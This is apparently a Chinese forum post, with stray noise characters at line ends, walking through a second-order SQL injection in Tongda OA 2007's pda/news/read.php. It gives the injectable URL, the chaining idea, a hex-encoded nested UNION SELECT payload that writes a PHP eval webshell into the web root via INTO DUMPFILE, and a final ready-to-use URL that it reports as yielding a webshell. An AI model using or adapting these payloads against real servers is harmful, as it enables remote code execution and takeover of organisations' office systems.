目前测试通达OA2007版本+ [% p& E9 }+ }1 I
3 }3 H, l3 s- [* b `- B( k* O
6 F- S8 T4 L& l$ _# FOffice Anywhere 2007 网络智能办公系统# S# j: Y% P* \# T0 d
+ U `; ^/ C P- C% Shttp://127.0.0.1/pda/news/read.php?P=%cf' 猪点。 暴web目录..
( b3 o4 _$ O( v5 T& i! } 5 i1 [' R2 {; U, R' U; I- o
X$ K/ b: i- Z; m; u2 [. y这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的' A3 h' }% V) w
/ E+ X2 O# X0 Q/ O
例如:SELECT * from USER where USER_ID='{$USERNAME}'
4 J% A# q" y3 n/ ]; j4 i0 G: g其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
. w3 k0 ~; l2 Q/ j3 J
1 {- h8 S) m I这个时候我们是不是可以组合起来使用哪?- ?9 B! i* a. G, O. u4 o6 [
v- V; h7 r% Z第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
" z+ ~' h+ k! ^' p3 t4 X7 kunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10" l; z" X7 x c4 }) O: {$ d6 V' J
8 T: m, M" _8 l* l5 E, R0 `
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了4 ]8 W$ H2 e; m! V8 g
2 r- p, h' ]; m9 \% b4 M+ k
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
1 U- j8 t9 x# n/ o / o& v. K- Z5 { y
那么我们用字符串格式带入进行hex编码
1 `" S' F' a0 Z5 G" n& G) @/ T ; J/ O" D) Z) ^3 R5 i/ Q
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
$ C9 A- h$ N& Y* O/ ]- ^2 T6 B 1 |# p8 ^, r! Y' O1 E$ b
测试ok,获取oa的webshell, S) x# G8 G4 ?
& j& h% |" b. G2 M1 I3 { 1 w+ s; j% B- s, T3 a, y
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%232 Z. |9 ]* E; v
直接getwebshell |